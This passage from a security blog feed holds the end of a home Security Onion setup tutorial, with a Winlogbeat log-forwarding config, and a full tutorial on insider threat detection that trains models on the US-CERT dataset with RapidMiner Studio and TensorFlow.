The next step is to upload our Security Onion ISO to the datastore. If we hit <storage> and <datastore browser> we can see everything currently inside of our datastore. If this is a fresh install it should only contain a folder called “.sdd.sf”. So we’re going to create a new directory for our ISO’s and upload our Security Onion ISO using the <upload> button within the datastore browser.

My datastore for ISOs and VMs

Once everything uploads we’re ready to create our VM! If we hit <virtual machines> followed by <Create / Register VM> we’re able to define everything we want for our project. Once you get to where you are able to define what settings are used in the VM you’re going to want to assign your second network adapter as well as specify to use a Datastore ISO file.

These exact settings aren’t needed. Just ensure your SPAN and Datastore ISO are selected

Setting up Security Onion

Now that we’ve got everything up to this point, the next step is to install the operating system. There should be an icon on the desktop that just needs to be double-clicked.

Once completed, we can begin our actual setup process. At this point, it’s important to know which interface is assigned to our SPAN port. I like to check MAC addresses to ensure everything is proper. We can begin by hitting that Setup icon. Through a series of prompts you will get to one which asks whether or not you want to configure your network interfaces. The answer is yes, and next it will ask which interface you would like to use as a management interface. This is NOT going to be our interface plugged into our SPAN.

This interface will be used to hit the web console

The setup will then ask whether or not you’d like a static IP vs one assigned via DHCP. The setup suggests a static IP, this is because that IP will always be reserved for this device instead of DHCP where the IP can change based on how our network is set up. We’ll set this up with a static IP of <192.168.1.125>, a netmask of <255.255.255.0> and a gateway of <192.168.1.1>. Your settings can be different based off of your network. These are just settings that work with mine.

After this, we will enable our sniffing interface, this is the interface which is connected to our SPAN port. If you only have two NICs then there should only be one device left to choose. Once completed we are prompted to restart our system, which we do. Following our restart we can begin the second phase of the setup process. Once again, we hit the setup button.

Now we’re going to skip the network configuration

Since we’ve already completed the network configuration we’re going to skip this task. For ease of use, we’re going to also choose <Evaluation Mode> instead of <Production Mode>. If you would like more granular control over your system I would recommend <Production Mode>. Feel free to continue on with the setup process until you create your user account. This will be the account that is used to access Kibana, Squert, and Sguil.

Feel free to create whatever username you wish

Once we confirm these are the settings that we wish, the system will go about configuring everything for us. This process can take a bit of time, so feel free to grab a coffee or something. Now we’re good to go right!? Sort of. Now we need to allow access to our management network so we can access it outside of the security onion machine.

We give access running the so-allow command

We see that there are a ton of different options that we can choose from. Though the one we care about right now is option a. So we choose that and allow anything on our network to talk to the management interface.

At the end, we should have seen something like this

Now we are pretty much all set up. We can access our Kibana interface and see everything that is coming through our network now.

But wait! There’s more!

We can take this a step further and forward our Windows event logs to our Security Onion machine automagically! This can be done with a combination of Sysmon and Winlogbeat. We’re going to install both Sysmon and Winlogbeat on any/all Windows machines on our network that we wish to monitor.

Sysmon all the things

For our Sysmon setup, we’re going to go with the setup done by InfoSec Taylor Swift via the resource setup on their Github. We just need to drop the sysmonconfig-export within our Sysmon folder like so. Here’s a great article on how to install Sysmon!

Here’s what your folder should look like

Winlogbeat for the win!

Now that we have Sysmon set up, we need to configure Winlogbeat to send our data off to our Security Onion. We can also add in different event logs to forward. Here is a sample of what the winlogbeat.yml should look like. You should be able to just copy and paste this over your existing file and be good to go. Here’s a great article on how to install Winlogbeat!

###################### Winlogbeat Configuration Example ########################### This file is an example configuration file highlighting only the most common
# options. The winlogbeat.reference.yml file from the same directory contains all the
# supported options with more comments. You can use it as a reference.
#
# You can find the full configuration reference here:
# https://www.elastic.co/guide/en/beats/winlogbeat/index.html#======================= Winlogbeat specific options ==========================# event_logs specifies a list of event logs to monitor as well as any
# accompanying options. The YAML data type of event_logs is a list of
# dictionaries.
#
# The supported keys are name (required), tags, fields, fields_under_root,
# forwarded, ignore_older, level, event_id, provider, and include_xml. Please
# visit the documentation for the complete details of each option.
# https://go.es.io/WinlogbeatConfig
winlogbeat.event_logs:
 — name: Application
 ignore_older: 72h- name: Security- name: System- name: Windows PowerShell- name: Internet Explorer- name: OpenSSH/Operational- name: OpenSSH/Admin- name: Microsoft-Windows-Winlogon/Operational- name: Microsoft-Windows-Windows Defender/WHC- name: Microsoft-Windows-Windows Defender/Operational- name: Microsoft-Windows-PowerShell/Operational- name: Microsoft-Windows-PowerShell/Admin- name: Microsoft-Windows-LSA/Operational- name: AMSI/Operational- name: Microsoft-Windows-Sysmon/Operational
 processors:
 -script:
 lang: javascript
 id: sysmon
 file: ${path.home}/module/sysmon/config/winlogbeat-sysmon.js#==================== Elasticsearch template setting ==========================setup.template.settings:
 index.number_of_shards: 3
 #index.codec: best_compression
 #_source.enabled: false#================================ General =====================================# The name of the shipper that publishes the network data. It can be used to group
# all the transactions sent by a single shipper in the web interface.
#name:# The tags of the shipper are included in their own field with each
# transaction published.
#tags: [“service-X”, “web-tier”]# Optional fields that you can specify to add additional information to the
# output.
#fields:
# env: staging#============================== Dashboards =====================================
# These settings control loading the sample dashboards to the Kibana index. Loading
# the dashboards is disabled by default and can be enabled either by setting the
# options here, or by using the `-setup` CLI flag or the `setup` command.
#setup.dashboards.enabled: true# The URL from where to download the dashboards archive. By default this URL
# has a value which is computed based on the Beat name and version. For released
# versions, this URL points to the dashboard archive on the artifacts.elastic.co
# website.
#setup.dashboards.url:#============================== Kibana =====================================# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API.
# This requires a Kibana endpoint configuration.
#setup.kibana:# Kibana Host
 # Scheme and port can be left out and will be set to the default (http and 5601)
 # In case you specify and additional path, the scheme is required: http://localhost:5601/path
 # IPv6 addresses should always be defined as: https://[2001:db8::1]:5601
 #host: “192.168.1.125:5601”# Kibana Space ID
 # ID of the Kibana Space into which the dashboards should be loaded. By default,
 # the Default Space will be used.
 #space.id:#============================= Elastic Cloud ==================================# These settings simplify using winlogbeat with the Elastic Cloud (https://cloud.elastic.co/).# The cloud.id setting overwrites the `output.elasticsearch.hosts` and
# `setup.kibana.host` options.
# You can find the `cloud.id` in the Elastic Cloud web UI.
#cloud.id:# The cloud.auth setting overwrites the `output.elasticsearch.username` and
# `output.elasticsearch.password` settings. The format is `<user>:<pass>`.
#cloud.auth:#================================ Outputs =====================================# Configure what output to use when sending the data collected by the beat.# — — — — — — — — — — — — — Elasticsearch output — — — — — — — — — — — — — — — 
#output.elasticsearch:
 # Array of hosts to connect to.
 #hosts: [“localhost:9200”]# Enabled ilm (beta) to use index lifecycle management instead daily indices.
 #ilm.enabled: false# Optional protocol and basic auth credentials.
 #protocol: “https”
 #username: “elastic”
 #password: “changeme”# — — — — — — — — — — — — — — — Logstash output — — — — — — — — — — — — — — — — 
output.logstash:
 # The Logstash hosts
 hosts: [“192.168.1.125:5044”]
 #loadbalance: true# Optional SSL. By default is off.
 # List of root certificates for HTTPS server verifications
 #ssl.certificate_authorities: [“/etc/pki/root/ca.pem”]# Certificate for SSL client authentication
 #ssl.certificate: “/etc/pki/client/cert.pem”# Client Certificate Key
 #ssl.key: “/etc/pki/client/cert.key”#================================ Processors =====================================# Configure processors to enhance or manipulate events generated by the beat.processors:
 — add_host_metadata: ~
 — add_cloud_metadata: ~#================================ Logging =====================================# Sets log level. The default log level is info.
# Available log levels are: error, warning, info, debug
#logging.level: debug# At debug level, you can selectively enable logging only for some components.
# To enable all selectors use [“*”]. Examples of other selectors are “beat”,
# “publish”, “service”.
#logging.selectors: [“*”]#============================== Xpack Monitoring ===============================
# winlogbeat can export internal metrics to a central Elasticsearch monitoring
# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The
# reporting is disabled by default.# Set to true to enable the monitoring reporter.
#xpack.monitoring.enabled: false# Uncomment to send the metrics to Elasticsearch. Most settings from the
# Elasticsearch output are accepted here as well. Any setting that is not set is
# automatically inherited from the Elasticsearch output configuration, so if you
# have the Elasticsearch output configured, you can simply uncomment the
# following line.
#xpack.monitoring.elasticsearch:

Last step!

Now we just need to head back to our Security Onion and run the <so-allow> command again! But we’re going to select option <b> to allow Logstash Beat through the firewall. It should look something like this.

Allowing Logstash Beat

Now, if everything is up and running properly. You should be able to monitor your home network using Security Onion. Hopefully you found this helpful!

Original link: https://medium.com/@Z3R0th/setting-up-security-onion-at-home-717340816b4e

The post Setting up Security Onion at home | By Z3R0th appeared first on eForensics.

↧

Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow

June 17, 2020, 1:08 am

≫ Next: Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow

≪ Previous: Setting up Security Onion at home | By Z3R0th

Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio

Summary

This technical article will teach you how to pre-process data, create your own neural networks, and train and evaluate models using the US-CERT's simulated insider threat dataset. The methods and solutions are designed for non-domain experts; particularly cyber security professionals. We will start our journey with the raw data provided by the dataset and provide examples of different pre-processing methods to get it "ready" for the AI solution to ingest. We will ultimately create models that can be re-used for additional predictions based on security events. Throughout the article, I will also point out the applicability and return on investment depending on your existing Information Security program in the enterprise.

Note: To use and replicate the pre-processed data and steps we use, prepare to spend 1-2 hours on this page. Stay with me and try not to fall asleep during the data pre-processing portion. What many tutorials don't state is that if you're starting from scratch; data pre-processing takes up to 90% of your time when doing projects like these.

At the end of this hybrid article and tutorial, you should be able to:

Pre-process the data provided from US-CERT into an AI solution ready format (Tensorflow in particular)
Use RapidMiner Studio and Tensorflow 2.0 + Keras to create and train a model using a pre-processed sample CSV dataset
Perform basic analysis of your data, chosen fields for AI evaluation, and understand the practicality for your organization using the methods described

Disclaimer

The author provides these methods, insights, and recommendations *as is* and makes no claim of warranty. Please do not use the models you create in this tutorial in a production environment without sufficient tuning and analysis before making them a part of your security program.

Tools Setup

If you wish to follow along and perform these activities yourself, please download and install the following tools from their respective locations:

Choose: To be hands on from scratch and experiment with your own variations of data: download the full dataset: ftp://ftp.sei.cmu.edu/pub/cert-data: *Caution: it is very large. Please plan to have several hundred gigs of free space
Choose: If you just want to follow along execute what I've done, you can download the pre-processed data, Python, and solution files from my Github (click repositories and find tensorflow-insiderthreat) https://github.com/dc401/tensorflow-insiderthreat
Optional: if you want a nice IDE for Python: Visual Studio 2019 Community Edition with the applicable Python extensions install
Required: Rapidminer Studio Trial (or educational license if it applies to you)
Required: Python environment , use the Python 3.8.3 x64 bit release
Required: Install python packages: (numpy, pandas, tensorflow, sklearn via "pip install <packagename>" from the command line

Overview of the Process

It's important for newcomers to any data science discipline to know that the majority of your time spent will be in data pre-processing and analyzing what you have which includes cleaning up the data, normalizing, extracting any additional meta insights, and then encoding the data so that it is ready for an AI solution to ingest it.

We need to extract and process the dataset in such a way where it is structured with fields that we may need as 'features' which is just to be inclusive in the AI model we create. We will need to ensure all the text strings are encoded into numbers so the engine we use can ingest it. We will also have to mark which are insider threat and non-threat rows (true positives, and true negatives).
Next, after data pre-processing we'll need select, setup, and create the functions we will use to create the model and create the neural network layers itself
Generate the model; and examine the accuracy, applicability, and identify additional modifications or tuning needed in any of part of the data pipeline

Examining the Dataset Hands on and Manual Pre-Processing

Examining the raw US-CERT data requires you to download compressed files that must be extracted. Note just how large the sets are compared to how much we will use and reduce at the end of the data pre-processing.

In our article, we saved a bunch of time by going directly to the answers.tar.bz2 that has the insiders.csv file for matching which datasets and individual extracted records of are value. Now, it is worth stating that in the index provided there has correlated record numbers in extended data such as the file, and psychometric related data. We didn't use the extended meta in this tutorial brief because of the extra time to correlate and consolidate all of it into a single CSV in our case.

No alt text provided for this image

To see a more comprehensive set of feature sets extracted from this same data, consider checking out this research paper called "Image-Based Feature Representation for Insider Threat Classification." We'll be referring to that paper later in the article when we examine our model accuracy.

Before getting the data encoded and ready for a function to read it; we need to get the data extracted and categorized into columns that we need to predict one. Let's use good old Excel to insert a column into the CSV. Prior to the screenshot we took and added all the rows from the referenced datasets in "insiders.csv" for scenario 2.

No alt text provided for this image

The scenario (2) is described in scenarios.txt: "User begins surfing job websites and soliciting employment from a competitor. Before leaving the company, they use a thumb drive (at markedly higher rates than their previous activity) to steal data."

Examine our pre-processed data that includes its intermediary and final forms as shown in the following below:

No alt text provided for this image

In the above photo, this is a snippet of all the different record types essentially appended to each other and properly sorted by date. Note that different vectors (http vs. email vs. device) do not all align easily have different contexts in the columns. This is not optimal by any means but since the insider threat scenario includes multiple event types; this is what we'll have to work with for now. This is the usual case with data that you'll get trying to correlate based on time and multiple events tied to a specific attribute or user like a SIEM does.

Mis-matched column data above we need to normalize

In the aggregation set; we combined the relevant CSV's after moving all of the items mentioned from the insiders.csv for scenario 2 into the same folder. To formulate the entire 'true positive' only dataset portion; we've used powershell as shown below:

No alt text provided for this image

Right now we have a completely imbalanced dataset where we only have true positives. We'll also have to add true negatives and the best approach is to have an equal amount of record types representing in a 50/50 scenario of non-threat activity. This is almost never the case with security data so we'll do what we can as you'll find below. I also want to point out, that if you're doing manual data processing in an OS shell-- whatever you import into a variable is in memory and does not get released or garbage collected by itself as you can see from my PowerShell memory consumption after a bunch of data manipulation and CSV wrangling, I've bumped up my usage to 5.6 GB.

No alt text provided for this image

Let's look at the R1 dataset files. We'll need to pull from that we know are confirmed true negatives (non-threats) for each of the 3 types from filenames we used in the true positive dataset extracts (again, it's from the R1 dataset which have benign events).

We'll merge a number of records from all 3 of the R1 true negative data sets from logon, http, and device files. Note, that in the R1 true negative set, we did not find an emails CSV which adds to the imbalance for our aggregate data set.

Using PowerShell we count the length of lines in each file. Since we had about ~14K of rows from the true positive side, I arbitrarily took from the true negative side the first 4500 applicable rows from each subsequent file and appended them to the training dataset so that we have both true positives, and true negatives mixed in. We'll have to add a column to mark which is a insider threat and which aren't.

No alt text provided for this image

In pre-processing our data we've already added all the records of interest below and selected various other true-negative non-threat records from the R1 dataset. Now we have our baseline of threats and non-threats concatenated in a single CSV. To the left, we've added a new column to denote a true/false or (1 or 0) in a find and replace scenario.

No alt text provided for this image

Above, you can also see we started changing true/false strings to numerical categories. This is us beginning on our path to encode the data through manual pre-processing which we could save ourselves the hassle as we see in future steps in RapidMiner Studio and using the Pandas Dataframe library in Python for Tensorflow. We just wanted to illustrate some of the steps and considerations you'll have to perform. Following this, we will continue processing our data for a bit. Let's highlight what we can do using excel functions before going the fully automated route.

No alt text provided for this image

We're also manually going to convert the date field into Unix Epoch Time for the sake of demonstration and as you seen it becomes a large integer with a new column. To remove the old column in excel for rename, create a new sheet such as 'scratch' and cut the old date (non epoch timestamp) values into that sheet. Reference the sheet along with the formula you see in the cell to achieve this effect. This formula is: "=(C2-DATE(1970,1,1))*86400" without quotes.

No alt text provided for this image

In our last manual pre-processing work example you need to format the CSV in is to 'categorize' by label encoding the data. You can automate this as one-hot encoding methods via a data dictionary in a script or in our case we show you the manual method of mapping this in excel since we have a finite set of vectors of the records of interest (http is 0, email is 1, and device is 2).

You'll notice that we have not done the user, source, or action columns as it has a very large number of unique values that need label encoding and it's just impractical by hand. We were able to accomplish this without all the manual wrangling above using the 'turbo prep' feature of RapidMiner Studio and likewise for the remaining columns via Python's Panda in our script snippet below. Don't worry about this for now, we will show case the steps in each different AI tool and up doing the same thing the easy way.

#print(pd.unique(dataframe['user']))
#https://pbpython.com/categorical-encoding.html
dataframe["user"] = dataframe["user"].astype('category')
dataframe["source"] = dataframe["source"].astype('category')
dataframe["action"] = dataframe["action"].astype('category')
dataframe["user_cat"] = dataframe["user"].cat.codes
dataframe["source_cat"] = dataframe["source"].cat.codes
dataframe["action_cat"] = dataframe["action"].cat.codes


#print(dataframe.info())
#print(dataframe.head())


#save dataframe with new columns for future datmapping
dataframe.to_csv('dataframe-export-allcolumns.csv')


#remove old columns
del dataframe["user"]
del dataframe["source"]
del dataframe["action"]
#restore original names of columns
dataframe.rename(columns={"user_cat": "user", "source_cat": "source", "action_cat": "action"}, inplace=True)

The above snippet is the using python's panda library example of manipulating and label encoding the columns into numerical values unique to each string value in the original data set. Try not to get caught up in this yet. We're going to show you the easy and comprehensive approach of all this data science work in Rapidminer Studio

Important step for defenders: Given that we're using the pre-simulated dataset that has been formatted from US-CERT, not every SOC is going to have access to the same uniform data for their own security events. Many times your SOC will have only raw logs to export. From an ROI perspective-- before pursuing your own DIY project like this, consider the level of effort and if you can automate exporting meta of your logs into a CSV format, an enterprise solution as Splunk or another SIEM might be able to do this for you. You would have to correlate your events and add as many columns as possible for enriched data formatting. You would also have to examine how consistent and how you can automate exporting this data in a format that US-CERT has to use similar methods for pre-processing or ingestion. Make use of your SIEM's API features to export reports into a CSV format whenever possible.

Walking through RapidMiner Studio with our Dataset

It's time use to some GUI based and streamlined approaches. The desktop edition of RapidMiner is Studio and the latest editions as of 9.6.x have turbo prep and auto modeling built in as part of your workflows. Since we're not domain experts, we are definitely going to take advantage of using this. Let's dig right in.

Note: If your trial expired before getting to this tutorial and use community edition, you will be limited to 10,000 rows. Further pre-processing is required to limit your datasets to 5K of true positives, and 5K of true negatives including the header. If applicable, use an educational license which is unlimited and renewable each year that you enrolled in a qualifying institution with a .edu email.

No alt text provided for this image

Upon starting we're going to start a new project and utilize the Turbo Prep feature. You can use other methods or the manual way of selecting operators via the GUI in the bottom left for the community edition. However, we're going to use the enterprise trial because it's easy to walk through for first-time users.

No alt text provided for this image

We'll import our aggregate CSV of true positive only data non-processed; and also remove the first row headers and use our own because the original row relates to the HTTP vector and does not apply to subsequent USB device connection and Email related records also in the dataset as shown below.

Note: Unlike our pre-processing steps which includes label encodings and reduction, we did not do this yet on RapidMiner Studio to show the full extent of what we can easily do in the 'turbo prep' feature. We're going to enable the use of quotes as well and leave the other defaults for proper string escapes.

No alt text provided for this image

Next, we set our column header types to their appropriate data types.

No alt text provided for this image

Stepping through the wizard we arrive at the turbo prep tab for review and it shows us distribution and any errors such as missing values that need to be adjusted and which columns might be problematic. Let's start with making sure we identify all of these true positives as insider threats to begin with. Click on generate and we're going to transform this dataset by inserting a new column in all the rows with a logical 'true' statement like so below

No alt text provided for this image

We'll save the column details and export it for further processing later or we'll use it as a base template set for when we begin to pre-process for the Tensorflow method following this to make things a little easier.

No alt text provided for this image

After the export as you can see above, don't forget we need to balance the data with true negatives. We'll repeat the same process of importing the true negatives. Now we should see multiple datasets in our turbo prep screen.

No alt text provided for this image

In the above, even though we've only imported 2 datasets, remember transformed the true positive by adding a column called insiderthreat which is a true/false boolean logic. We do the same with true negatives and you'll eventually end up with 4 of these listings.

We'll need to merge the true positives and true negatives into a 'training set' before we get to do anything fun with it. But first, we also need to drop columns that we don't think are relevant our useful such as the transaction ID and the description column of the website keywords scraped as none of the other row data have these; and and would contain a bunch of empty (null) values that aren't useful for calculation weights.

No alt text provided for this image

Important thought: As we've mentioned regarding other research papers, choosing columns for calculation aka 'feature sets' that include complex strings have to be tokenized using natural language processing (NLP). This adds to your pre-processing requirements in additional to label encoding in which in the Tensorflow + Pandas Python method would usually require wrangling multiple data frames and merging them together based on column keys for each record. While this is automated for you in RapidMiner, in Tensorflow you'll have to include this in your pre-processing script. More documentation about this can be found here.

Take note that we did not do this in our datasets because you'll see much later in an optimized RapidMiner Studio recommendation that heavier weight and emphasis on the date and time are were more efficient feature sets with less complexity. You on other hand on different datasets and applications may need to NLP for sentiment analysis to add to the insider threat modeling.

Finishing your training set: Although we do not illustrate this, after you have imported both true negatives and true positives within the Turbo prep menu click on the "merge" button and select both transformed datasets and select the "Append" option since both have been pre-sorted by date.

Continue to the Auto Model feature

Within RapidMiner Studio we continue to the 'Auto Model' tab and utilize our selected aggregate 'training' data (remember training data includes true positives and true negatives) to predict on the insiderthreat column (true or false)

No alt text provided for this image

We also notice what our actual balance is. We are still imbalanced with only 9,001 records of non-threats vs. threats of ~14K. It's imbalanced and that can always be padded with additional records should you choose. For now, we'll live with it and see what we can accomplish with not-so-perfect data.

No alt text provided for this image

Here the auto modeler recommends different feature columns in green and yellow and their respective correlation. The interesting thing is that it is estimating date is of high correlation but less stability than action and vector.

Important thought: In our head, we would think as defenders all of the feature set applies in each column as we've already reduced what we could as far as relevance and complexities. It's also worth mentioning that this is based off a single event. Remember insider threats often take multiple events as we saw in the answers portion of the insiders.csv . What the green indicators are showing us are unique record single event identification.

No alt text provided for this image

We're going to use all the columns anyways because we think it's all relevant columns to use. We also move to the next screen on model types, and because we're not domain experts we're going to try almost all of them and we want the computer to re-run each model multiple times finding the optimized set of inputs and feature columns.

Remember that feature sets can include meta information based on insights from existing columns. We leave the default values of tokenization and we want to extract date and text information. Obviously the items with the free-form text are the 'Action' column with all the different URLs, and event activity that we want NLP to be applied. And we want to correlate between columns, the importance of columns, and explain predictions as well.

No alt text provided for this image

Note that in the above we've pretty much selected bunch of heavy processing parameters in our batch job. On an 8 core single threadded processor running Windows 10, 24 GB memory and a GPU of a Radeon RX570 value series with SSD's all of these models took about 6 hours to run total with all the options set. After everything was completed we have 8000+ models and 2600+ feature set combinations tested in our screen comparison.

No alt text provided for this image

According to RapidMiner Studio; the deep learning neural network methods aren't the best ROI fit; compared to the linear general model. There are no errors though- and that's worrisome which might mean that we have poor quality data or an overfit issue with the model. Let's take a look at deep learning as it also states a potential 100% accuracy just to compare it.

No alt text provided for this image

In the Deep Learning above it's tested against 187 different combinations of feature sets and the optimized model shows that unlike our own thoughts as to what features would be good including the vector and action mostly. We see even more weight put on the tokens in Action interesting words and the dates. Surprisingly; we did not see anything related to "email" or the word "device" in the actions as part of the optimized model.

No alt text provided for this image

Not to worry, as this doesn't mean we're dead wrong. It just means the feature sets it selected in its training (columns and extracted meta columns) provided less errors in the training set. This could be that we don't have enough diverse or high quality data in our set. In the previous screen above you saw an orange circle and a translucent square.

The orange circle indicates the models suggested optimizer function and the square is our original selected feature set. If you examine the scale, our human selected feature set was an error rate of 0.9 and 1% which gives our accuracy closer to the 99% mark; but only at a much higher complexity model (more layers and connections in the neural net required) That makes me feel a little better and just goes to show you that caution is needed when interpreting all of these at face value.

Tuning Considerations

Let's say you don't fully trust such a highly "100% accurate model". We can try to re-run it using our feature sets in vanilla manner as a pure token label. We're *not* going extract date information, no text tokenization via NLP and we don't want it to automatically create new feature set meta based on our original selections. Basically, we're going to use a plain vanilla set of columns for the calculations.

No alt text provided for this image

So in the above let's re-run it looking at 3 different models including the original best fit model and the deep learning we absolutely no optimization and additional NLP applied. So it's as if we only used encoded label values only in the calculations and not much else.

No alt text provided for this image

In the above, we get even worse results with an error rate of 39% is a 61% accuracy across pretty much all the models. Our selection and lack of complexity without using text token extraction is so reduced that even a more "primitive" Bayesian model (commonly used in basic email spam filter engines) seems to be just as accurate and has a fast compute time. This all looks bad but let's dig a little deeper:

No alt text provided for this image

When we select the details of the deep learning model again we see the accuracy climb in linear fashion as more of the training set population is discovered and validated against. From an interpretation stand point this shows us a few things:

Our original primitive thoughts of feature sets of focusing on the vector and action frequency using only unique encoded values is about as only as good as a toss-up probability of an analyst finding a threat in the data. On the surface it appears that we have at best a 10% gain of increasing our chances of detecting an insider threat.
It also shows that even though action and vector were first thought of 'green' for unique record events for a better input selection was actually the opposite for insider threat scenarios that we need to think about multiple events for each incident/alert. In the optimized model many of the weights and tokens used were time correlated specific and action token words
This also tells us that our base data quality for this set is rather low and we would need additional context and possibly sentiment analysis of each user for each unique event which is also an inclusive HR data metric 'OCEAN' in the psychometric.csv file. Using tokens through NLP; we would possibly tune to include the column of mixture of nulls to include the website descriptor words from the original data sets and maybe the files.csv that would have to merged into our training set based on time and transaction ID as keys when performing those joins in our data pre-processing

Deploying your model optimized (or not)

While this section does not show screenshots, the last step in the RapidMiner studio is to deploy the optimized or non-optimized model of your choosing. Deploying locally in the context of studio won't do much for you other than to re-use a model that you really like and to load new data through the interactions of the Studio application. You would need RapidMiner Server to make local or remote deployments automated to integrate with production applications. We do not illustrate such steps here, but there is great documentation on their site at: https://docs.rapidminer.com/latest/studio/guided/deployments/

But what about Tensorflow 2.0 and Keras?

Maybe RapidMiner Studio wasn't for us and everyone talks about Tensorflow (TF) as one of the leading solutions. But, TF does not have a GUI. The new TF v2.0 has Keras API part of the installation which makes interaction in creating the neural net layers much easier along getting your data ingested from Python's Panda Data Frame into model execution. Let's get started.

As you recall from our manual steps we start data pre-processing. We re-use the same scenario 2 and data set and will use basic label encoding like we did with our non-optimized model in RapidMiner Studio to show you the comparison in methods and the fact the it's all statistics at the end of the day based on algorithmic functions converted into libraries. Reusing the screenshot, remember that we did some manual pre-processing work and converted the insiderthreat, vector, and date columns into category numerical values already like so below:

No alt text provided for this image

I've placed a copy of the semi-scrubbed data on the Github if you wish to review the intermediate dataset prior to us running Python script to pre-process further:

No alt text provided for this image

Let's examine the python code to help us get to the final state we want which is:

No alt text provided for this image

The code can be copied below:

import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow import feature_column
from tensorflow.keras import layers
from sklearn.model_selection import train_test_split
from pandas.api.types import CategoricalDtype


#Use Pandas to create a dataframe
#In windows to get file from path other than same run directory see:
#https://stackoverflow.com/questions/16952632/read-a-csv-into-pandas-from-f-drive-on-windows-7


URL = 'https://raw.githubusercontent.com/dc401/tensorflow-insiderthreat/master/scenario2-training-dataset-transformed-tf.csv'
dataframe = pd.read_csv(URL)
#print(dataframe.head())


#show dataframe details for column types
#print(dataframe.info())


#print(pd.unique(dataframe['user']))
#https://pbpython.com/categorical-encoding.html
dataframe["user"] = dataframe["user"].astype('category')
dataframe["source"] = dataframe["source"].astype('category')
dataframe["action"] = dataframe["action"].astype('category')
dataframe["user_cat"] = dataframe["user"].cat.codes
dataframe["source_cat"] = dataframe["source"].cat.codes
dataframe["action_cat"] = dataframe["action"].cat.codes


#print(dataframe.info())
#print(dataframe.head())


#save dataframe with new columns for future datmapping
dataframe.to_csv('dataframe-export-allcolumns.csv')


#remove old columns
del dataframe["user"]
del dataframe["source"]
del dataframe["action"]
#restore original names of columns
dataframe.rename(columns={"user_cat": "user", "source_cat": "source", "action_cat": "action"}, inplace=True)
print(dataframe.head())
print(dataframe.info())


#save dataframe cleaned up
dataframe.to_csv('dataframe-export-int-cleaned.csv')




#Split the dataframe into train, validation, and test
train, test = train_test_split(dataframe, test_size=0.2)
train, val = train_test_split(train, test_size=0.2)
print(len(train), 'train examples')
print(len(val), 'validation examples')
print(len(test), 'test examples')


#Create an input pipeline using tf.data
# A utility method to create a tf.data dataset from a Pandas Dataframe
def df_to_dataset(dataframe, shuffle=True, batch_size=32):
  dataframe = dataframe.copy()
  labels = dataframe.pop('insiderthreat')
  ds = tf.data.Dataset.from_tensor_slices((dict(dataframe), labels))
  if shuffle:
    ds = ds.shuffle(buffer_size=len(dataframe))
  ds = ds.batch(batch_size)
  return ds




#choose columns needed for calculations (features)
feature_columns = []
for header in ["vector", "date", "user", "source", "action"]:
    feature_columns.append(feature_column.numeric_column(header))


#create feature layer
feature_layer = tf.keras.layers.DenseFeatures(feature_columns)


#set batch size pipeline
batch_size = 32
train_ds = df_to_dataset(train, batch_size=batch_size)
val_ds = df_to_dataset(val, shuffle=False, batch_size=batch_size)
test_ds = df_to_dataset(test, shuffle=False, batch_size=batch_size)


#create compile and train model
model = tf.keras.Sequential([
  feature_layer,
  layers.Dense(128, activation='relu'),
  layers.Dense(128, activation='relu'),
  layers.Dense(1)
])


model.compile(optimizer='adam',
              loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
              metrics=['accuracy'])


model.fit(train_ds,
          validation_data=val_ds,
          epochs=5)


loss, accuracy = model.evaluate(test_ds)
print("Accuracy", accuracy)

In our scenario we're going to ingest the data from Github. I've included in the comment the method of using the os import to do so from a file local to your disk. One thing to point out is that we use the Pandas dataframe construct and methods to manipulate the columns using label encoding for the input. Note that this is not the optimized manner as which RapidMiner Studio reported to us.

We're still using our same feature set columns in the second round of modeling we re-ran in the previous screens; but this time in Tensorflow for method demonstration.

No alt text provided for this image

Note in the above there is an error in how vector still shows 'object' in the DType. I was pulling my hair out looking and I found I needed to update the dataset as I did not capture all the values into the vector column as a category numerical like I originally thought. Apparently, I was missing one. Once this was all corrected and errors gone, the model training was ran without a problem.

Unlike RapidMiner Studio, we don't just have one large training set and let the system do it for us. We must divide the training set into smaller pieces that must be ran through a batch based on the following as a subset for the model to be trained using known correct data of true/false insider threats and a reserved portion that is split which is the remaining being validation only.

No alt text provided for this image

Next we need to choose our feature columns, which again is the 'non optimized' columns of our 5 columns of data encoded. We use a sampling batch size of 32 in each round of validation (epoch) for the pipeline as we define it early on.

No alt text provided for this image

Keep note that we did not execute anything related to the tensor or even create a model yet. This is all just data prep and building the 'pipeline' that feeds the tensor. Below is when we create the model using the layers in sequential format using Keras, we compile the model using Google TF's tutorial demo optimizer and loss functions with an emphasis on accuracy. We try to fit and validate the model with 5 rounds and then print the display.

Welcome to the remaining 10% of your journey in applying AI to your insider threat data set!

No alt text provided for this image

Let's run it again and well-- now we see accuracy of around 61% like last time! So again, this just proves that a majority of your outcome will be in the data science process itself and the quality surrounding the pre-processing, tuning, and data. Not so much about which core software solution you go with. Without the optimizing and testing multiple model experimenting simulating in varying feature sets; our primitive models will only be at best 10% better than random chance sampling that a human analyst may or may not catch reviewing the same data.

No alt text provided for this image

Where is the ROI for AI in Cyber Security

For simple project tasks that can be accomplished on individual events as an alert vs. an incident using non-domain experts; AI enabled defenders through SOC's or threat hunting can better achieve ROI faster on things that are considered anomalous or not using baseline data. Examples include anomalies user agent strings that may show C2 infections, or K-means or KNN clustering based on cyber threat intelligence IOC's that may show specific APT similarities. There's some great curated lists found on Github that may give your team ideas on what else they can pursue with some simple methods as we've demonstrated in this article. Whatever software solution you elect to use, chances are that our alert payloads really need NLP applied and an appropriately sized neural network created to engage in more accurate modeling. Feel free to modify our base python template and try it out yourself.

Comparing the ~60% accuracy vs. other real-world cyber use cases

I have to admit, I was pretty disappointed in myself at first; even if we knew this was not a tuned model with the labels and input selection I had. But when we cross compare it with other more complex datasets and models in the communities such as Kaggle: It really isn't as bad as we first thought. Microsoft hosted a malware detection competition to the community and provided enriched datasets. The competition highest scores show 67% prediction accuracy and this was in 2019 with over 2400 teams competing. One member shared their code which had a 63% score and was released free and to the public as a great template if you wanted to investigate further. He titles LightGBM.

No alt text provided for this image

